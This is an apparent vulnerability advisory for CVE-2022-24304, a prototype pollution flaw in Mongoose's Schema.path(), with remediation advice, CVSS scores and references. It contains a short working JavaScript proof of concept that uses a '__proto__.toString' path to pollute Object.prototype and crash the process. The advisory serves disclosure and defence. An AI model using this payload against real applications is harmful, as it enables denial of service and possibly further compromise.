CVE-2022-24304
Mongoose Vulnerable to Prototype Pollution in Schema Object
Description
### Description Mongoose is a MongoDB object modeling tool designed to work in an asynchronous environment. Affected versions of this package are vulnerable to Prototype Pollution. The `Schema.path()` function is vulnerable to prototype pollution when setting the `schema` object. This vulnerability allows modification of the Object prototype and could be manipulated into a Denial of Service (DoS) attack. ### Proof of Concept ```js // poc.js const mongoose = require('mongoose'); const schema = new mongoose.Schema(); malicious_payload = '__proto__.toString' schema.path(malicious_payload, [String]) x = {} console.log(x.toString()) // crashed (Denial of service (DoS) attack) ``` ### Impact This vulnerability can be manipulated to exploit other types of attacks, such as Denial of service (DoS), Remote Code Execution, or Property Injection.
How to fix CVE-2022-24304
To remediate CVE-2022-24304, upgrade the affected package to a fixed version below.
- —upgrade to 6.4.6 or later
Is CVE-2022-24304 being exploited?
No exploitation signal available. Neither CISA KEV nor a current EPSS score has been published for CVE-2022-24304.
Affected packages (1)
- >= 6.0.0, < 6.4.6
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
References (6)
- ADVISORYnvd.nist.gov/vuln/detail/CVE-2022-24304
- WEBgithub.com/Automattic/mongoose/blob/51e758541763b6f14569744ced15cc23ab8b50c6/lib/schema.js#L88-L141
- WEBgithub.com/Automattic/mongoose/commit/6a197316564742c0422309e1b5fecfa4faec126e
- WEBgithub.com/Automattic/mongoose/commit/a45cfb6b0ce0067ae9794cfa80f7917e1fb3c6f8